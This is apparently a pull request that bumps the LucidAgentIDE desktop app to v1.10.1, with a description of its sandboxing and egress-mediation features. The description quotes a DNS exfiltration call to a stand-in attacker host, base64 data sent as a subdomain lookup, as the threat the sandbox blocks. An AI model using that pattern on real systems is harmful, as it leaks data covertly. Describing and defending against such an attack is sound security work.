### PR TITLE
release: v1.10.1 — the runtime execution boundary (P-SANDBOX) + batch since 1.10.0

### DIFF
--- a/desktop/about.test.ts
+++ b/desktop/about.test.ts
@@ -15,8 +15,8 @@ describe("version is single-sourced", () => {
     expect(pkg.version).toBe(APP_VERSION);
   });
 
-  test("app version is v1.10.0", () => {
-    expect(APP_VERSION).toBe("1.10.0");
+  test("app version is v1.10.1", () => {
+    expect(APP_VERSION).toBe("1.10.1");
   });
 });
 
@@ -25,7 +25,7 @@ describe("aboutHtml", () => {
 
   test("shows the dynamic version with a v prefix", () => {
     expect(html).toContain(`v${APP_VERSION}`);
-    expect(html).toContain("v1.10.0");
+    expect(html).toContain("v1.10.1");
   });
 
   test("carries the product + company identity", () => {

--- a/desktop/package.json
+++ b/desktop/package.json
@@ -1,7 +1,7 @@
 {
   "name": "lucidagentide-desktop",
   "private": true,
-  "version": "1.10.0",
+  "version": "1.10.1",
   "trustedDependencies": ["electron", "@resvg/resvg-js"],
   "description": "Electron desktop shell for LucidAgentIDE + omp — gated agent chat + live security/memory dashboards.",
   "homepage": "https://github.com/mlcyclops/lucidagentide",

--- a/desktop/version.ts
+++ b/desktop/version.ts
@@ -111,4 +111,13 @@
 //           epic (allow-list chips, live canvas, portable share/import, n8n interop, /command authoring);
 //           the Agent FIREWALL (fail-closed proxy to remote hermes/openclaw ACP agents) + in-process MCP
 //           tool-result gate; and NEOVIM / terminal integration.
-export const APP_VERSION = "1.10.0";
+// v1.10.1 = the RUNTIME EXECUTION BOUNDARY epic (P-SANDBOX, ADR-0157): an approved subprocess is now
+//           OS-isolated (Linux bwrap, macOS Seatbelt) and its egress is MEDIATED through a loopback proxy
+//           decided by your curated egress policy - an import-time DNS exfil is refused + audited, and the
+//           whole posture is visible in the Security panel (ADR-0159/0166/0167/0168/0169; Windows AppContainer
+//           verified for deny-network, mediated egress disclosed as a managed/enterprise capability, ADR-0172/3).
+//           Plus: model-picker FAVORITES (ADR-0165), multi-repo Engineering Reports + reach-out audit
+//           (ADR-0162/0164), security review-ACKs + resumed-session history (ADR-0170/0171), a toolbox badge
+//           for failed tool calls (ADR-0163), the LUCID TUI theme + bare `lucid` (ADR-0160/0161), and the
+//           Plugin Marketplace popup (ADR-0158).
+export const APP_VERSION = "1.10.1";


### PR DESCRIPTION
## v1.10.1

Single-source version bump: `desktop/version.ts` `APP_VERSION` + `desktop/package.json` (kept in lockstep by `about.test.ts`). Everything below is already merged on `master`; this tags it.

### Headline — the runtime execution boundary (P-SANDBOX epic, ADR-0157)
An approved subprocess is now **OS-isolated** (Linux **bwrap**, macOS **Seatbelt**) and its network is **mediated** through a loopback proxy decided by your curated egress policy — an import-time `gethostbyname("<b64>.attacker.cn")` DNS exfil is **refused + audited**, and the whole posture (which backend, whether egress is mediated, every refused reach-out) is visible in the **Security panel**. Windows **AppContainer** is verified for the network-off (`--deny-network`) case; mediated Windows egress is disclosed as a managed/enterprise capability. *(ADR-0159/0166/0167/0168/0169; 0172/0173.)*

### Also in this batch
- Model-picker **favorites** (ADR-0165)
- Multi-repo **Engineering Reports** + a SecurityEvent per reach-out (ADR-0162/0164)
- **Security review-acks** + resumed-session thinking/tool history (ADR-0170/0171)
- **Toolbox badge** for failed tool calls (ADR-0163)
- LUCID **TUI theme** + bare `lucid` starts the gated TUI (ADR-0160/0161)
- **Plugin Marketplace** popup (ADR-0158)

### Cut process
On merge: tag `v1.10.1` on the merge commit → `build-desktop.yml` (trigger `push: tags: v*`) builds + attaches the Windows / macOS / Linux installers to the Release.

🤖 Generated with [Claude Code](https://claude.com/claude-code)